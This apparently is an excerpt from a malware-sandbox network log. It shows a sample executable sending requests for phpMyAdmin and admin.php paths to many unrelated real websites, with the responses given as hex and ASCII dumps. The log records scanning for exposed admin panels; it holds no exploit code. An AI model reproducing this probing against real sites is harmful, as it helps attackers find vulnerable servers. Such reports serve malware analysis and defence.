                                                                                                                                                                                                    2023-11-26 05:59:41 UTC3313INData Raw: 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 61 62 6f 75 74 75 73 2f 22 3e 41 62 6f 75 74 20 48 4d 53 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 35 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 35
                                                                                                                                                                                                    Data Ascii: -post_type menu-item-object-page menu-item-has-children menu-item-3412"><a href="https://himontessori.com/aboutus/">About HMS</a><ul class="sub-menu"><li id="menu-item-3415" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3415
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC8192INData Raw: 33 62 31 30 0d 0a 09 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 3c 2f 6e 61 76 3e 3c 21 2d 2d 20 23 73 69 74 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2d 2d 3e 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 68 65 61 64 65 72 20 69 64 3d 22 6d 61 73 74 68 65 61 64 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 62 61 62 79 2d 68 65 61 64 2d 69 6d 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 68 65 61 64 65 72 2d 69 6d 67 22 3e 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 62 79 2d 63 6f 6e 74 61 69 6e 65 72 20 73 69 74 65 2d 62 72 61 6e 64 69 6e 67 20 22 3e 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 3b10</nav>... #site-navigation --></div></div></div><header id="masthead" class="site-header baby-head-img"> <div class="no-header-img"> <div class="baby-container site-branding ">
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC6934INData Raw: 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 34 2f 27 3e 20 41 70 72 69 6c 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 33 2f 27 3e 20 4d 61 72 63 68 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 32 2f 27 3e 20 46 65 62 72 75 61 72 79 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74
                                                                                                                                                                                                    Data Ascii: 021 </option><option value='https://himontessori.com/2021/04/'> April 2021 </option><option value='https://himontessori.com/2021/03/'> March 2021 </option><option value='https://himontessori.com/2021/02/'> February 2021 </option><option value='htt
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC4275INData Raw: 31 30 61 36 0d 0a 0a 09 09 3c 2f 73 65 6c 65 63 74 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 64 72 6f 70 64 6f 77 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 20 22 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 2d 2d 31 22 20 29 3b 0a 09 66 75 6e 63 74 69 6f 6e 20 6f 6e 53 65 6c 65 63 74 43 68 61 6e 67 65 28 29 20 7b 0a 09 09 69 66 20 28 20 64 72 6f 70 64 6f 77 6e 2e 6f 70 74 69 6f 6e 73 5b 20 64 72 6f 70 64 6f 77 6e 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 20 5d 2e 76 61 6c 75 65 20 21 3d 3d 20 27 27 20 29 20 7b 0a 09 09 09 64 6f 63 75 6d 65 6e
                                                                                                                                                                                                    Data Ascii: 10a6</select><script type='text/javascript'>/* <![CDATA[ */(function() {var dropdown = document.getElementById( "archives-dropdown--1" );function onSelectChange() {if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {documen


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    284192.168.2.46291013.32.208.274436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1145INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 31 30 2e 30 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 3067Connection: closeDate: Sun, 26 Nov 2023 05:59:41 GMTCache-Control: privateServer: Microsoft-IIS/10.0Strict-Transport-Security: max-age=31536000; includeSubDomain
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC3067INData Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 72 72 69 73 65 73 64 2e 6f 72 67 2f 53 74 61 74 69 63 2f 2f 73 69 74 65 2f 61 73 73 65 74 73 2f 53 74 79 6c 65 73 2f 73 79 73 74 65 6d 5f 32 37 34 31 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: <html><head> <link rel="Stylesheet" type="text/css" href="https://www.perrisesd.org/Static//site/assets/Styles/system_2741.css" /> <title>Error 404 - Page Not Found</title> <style type="text/css"> @font-face { font


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    285192.168.2.46274918.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC206INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 61 67 72 69 63 6f 6c 61 2e 63 6f 6d 2e 62 72 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rechagricola.com.br/phpmyadmin/
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    286192.168.2.46290234.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC179OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: www.linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1085INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 32 2e 31 33 32 31 30 33 35 36 33 36 31 34 35 37 31 36 32 39 36 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978382.1321035636145716296Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Optio
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC167INData Raw: 62 33 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61
                                                                                                                                                                                                    Data Ascii: b31 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sca
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1252INData Raw: 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c
                                                                                                                                                                                                    Data Ascii: le=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1252INData Raw: 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e
                                                                                                                                                                                                    Data Ascii: ices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC206INData Raw: 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    287192.168.2.46284034.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC175OUTGET /en/admin.php HTTP/1.1
                                                                                                                                                                                                    Host: www.dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1078INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 31 2e 30 37 35 31 30 33 33 31 39 38 39 30 31 35 39 33 34 37 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978381.075103319890159347Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC174INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-s
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1252INData Raw: 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72
                                                                                                                                                                                                    Data Ascii: calable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="r
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1252INData Raw: 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72
                                                                                                                                                                                                    Data Ascii: arty/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/er
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC187INData Raw: 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: gardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    288192.168.2.462843162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC172OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC667INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 70 62 69 64 3d 33 37 61 35 66 35 35 38 32 31 64 64 34 64 38 62 33 65 36 33 62 39 34 32 35 62 62 35 66 33 65 66 62 62 30 32 63 66 30 39 61 31 61 39 63 61 38 38 37 62 33 65 37 37 62 30 35 33 37 63 61 38
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: pbid=37a5f55821dd4d8b3e63b9425bb5f3efbb02cf09a1a9ca887b3e77b0537ca8
